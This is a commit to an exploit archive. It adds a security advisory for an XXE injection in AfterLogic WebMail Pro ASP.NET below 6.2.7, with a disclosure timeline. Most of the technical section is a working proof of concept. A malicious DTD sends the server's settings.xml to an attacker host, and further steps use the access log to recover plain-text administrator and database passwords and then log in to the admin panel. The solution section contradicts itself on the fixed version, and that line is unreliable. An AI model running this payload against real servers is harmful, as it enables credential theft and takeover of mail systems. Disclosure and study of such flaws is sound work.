DB: 2016-05-25
1 new exploits AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XXE Injection
This commit is contained in:
parent
399580a6c2
commit
b189e25266
2 changed files with 124 additions and 0 deletions
|
@ -36034,3 +36034,4 @@ id,file,description,date,author,platform,type,port
|
|||
39847,platforms/lin_x86-64/shellcode/39847.c,"Linux x86_64 Information Stealer Shellcode",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
|
||||
39848,platforms/php/webapps/39848.py,"Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80
|
||||
39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443
|
||||
39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XXE Injection",2016-05-24,"Mehmet Ince",asp,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
123
platforms/asp/webapps/39850.txt
Executable file
123
platforms/asp/webapps/39850.txt
Executable file
|
@ -0,0 +1,123 @@
|
|||
1. ADVISORY INFORMATION
|
||||
========================================
|
||||
Title: AfterLogic WebMail Pro ASP.NET Administrator Account Takover via XXE
|
||||
Injection
|
||||
Application: AfterLogic WebMail Pro ASP.NET
|
||||
Class: Sensitive Information disclosure
|
||||
Remotely Exploitable: Yes
|
||||
Versions Affected: AfterLogic WebMail Pro ASP.NET < 6.2.7
|
||||
Vendor URL: http://www.afterlogic.com/webmail-client-asp-net
|
||||
Bugs: XXE Injection
|
||||
Date of found: 28.03.2016
|
||||
Reported: 22.05.2016
|
||||
Vendor response: 22.05.2016
|
||||
Date of Public Advisory: 23.05.2016
|
||||
Author: Mehmet Ince
|
||||
|
||||
|
||||
2. CREDIT
|
||||
========================================
|
||||
This vulnerability was identified during penetration test
|
||||
by Mehmet INCE & Halit Alptekin from PRODAFT / INVICTUS
|
||||
|
||||
|
||||
3. VERSIONS AFFECTED
|
||||
========================================
|
||||
AfterLogic WebMail Pro ASP.NET < 6.2.7
|
||||
|
||||
|
||||
4. INTRODUCTION
|
||||
========================================
|
||||
It seems that /webmail/spellcheck.aspx?xml= endpoint takes XML request as
|
||||
an parameter and parse it with XML entities.
|
||||
By abusing XML entities attackers can read Web.config file as well as
|
||||
settings.xml that contains administrator account
|
||||
credentials in plain-text.
|
||||
|
||||
5. TECHNICAL DETAILS & POC
|
||||
========================================
|
||||
|
||||
1 - Put following XML entity definition into your attacker server. E.g:
|
||||
/var/www/html/test.dtd. Do NOT forget to change ATTACKER_SERVER_IP.
|
||||
|
||||
<!ENTITY % payl SYSTEM
|
||||
"file://c:/inetpub/wwwroot/apps/webmail/app_data/settings/settings.xml">
|
||||
<!ENTITY % int "<!ENTITY % trick SYSTEM '
|
||||
http://ATTACKER_SERVER_IP/?p=%payl;'>">
|
||||
|
||||
2 - Start reading access log on your attacker server.
|
||||
|
||||
tail -f /var/log/apache/access.log
|
||||
|
||||
3 - Send following HTTP GET request to the target.
|
||||
|
||||
http://TARGET_DOMAIN/webmail/spellcheck.aspx?xml=<?xml version="1.0"
|
||||
encoding="utf-8"?>
|
||||
<!DOCTYPE root [
|
||||
<!ENTITY % remote SYSTEM "http://81.17.25.9/test.dtd">
|
||||
%remote;
|
||||
%int;
|
||||
%trick;]>
|
||||
|
||||
4 - You will see the settings.xml content in your access log.
|
||||
5 - In order to decode and see it in pretty format. Please follow
|
||||
instruction in order.
|
||||
5.1 - Create urldecode alias by executing following command.
|
||||
|
||||
alias urldecode='python -c "import sys, urllib as ul; \
|
||||
print ul.unquote_plus(sys.argv[1])"'
|
||||
|
||||
5.2 - Get last line of access log and pass it to the urldecode.
|
||||
|
||||
root@hacker:/var/www/html# urldecode $(tail -n 1
|
||||
/var/log/apache2/access.log|awk {'print $7'})
|
||||
/?p=
|
||||
<Settings>
|
||||
<Common>
|
||||
<SiteName>[SITE_NAME_WILL_BE_HERE]</SiteName>
|
||||
<LicenseKey>[LICENSE_KEY]/LicenseKey>
|
||||
<AdminLogin>[ADMINISTRATOR_USERNAME]</AdminLogin>
|
||||
<AdminPassword>[ADMINISTRATOR_PASSWORD]</AdminPassword>
|
||||
<DBType>MSSQL</DBType>
|
||||
<DBLogin>WebMailUser</DBLogin>
|
||||
<DBPassword>[DATABASE_PASSWORD]</DBPassword>
|
||||
<DBName>Webmail</DBName>
|
||||
<DBDSN>
|
||||
</DBDSN>
|
||||
<DBHost>localhost\SQLEXPRESS</DBHost>
|
||||
....
|
||||
....
|
||||
...
|
||||
|
||||
6 - You can login by using these administration credentials.
|
||||
Login panel is located at http://TARGET_DOMAIN/webmail/adminpanel/
|
||||
|
||||
|
||||
6. RISK
|
||||
========================================
|
||||
The vulnerability allows remote attackers to read sensitive information
|
||||
from the server such as settings.xml or web.config which contains
|
||||
administrator
|
||||
account and database credentials.
|
||||
|
||||
7. SOLUTION
|
||||
========================================
|
||||
Update to the latest version v1.4.2
|
||||
|
||||
8. REPORT TIMELINE
|
||||
========================================
|
||||
28.03.2016: Vulnerability discovered during pentest
|
||||
29.03.2016: Our client requested a time to mitigate their infrastructures
|
||||
22.05.2016: First contact with vendor
|
||||
22.05.2016: Vendor requested more technical details.
|
||||
23.05.2016: Vendor publishes update with 6.2.7 release.
|
||||
23.05.2016: Advisory released
|
||||
|
||||
9. REFERENCES
|
||||
========================================
|
||||
https://twitter.com/afterlogic/status/734764320165400576
|
||||
|
||||
|
||||
--
|
||||
Sr. Information Security Engineer
|
||||
https://www.mehmetince.net
|
Loading…
Add table
Reference in a new issue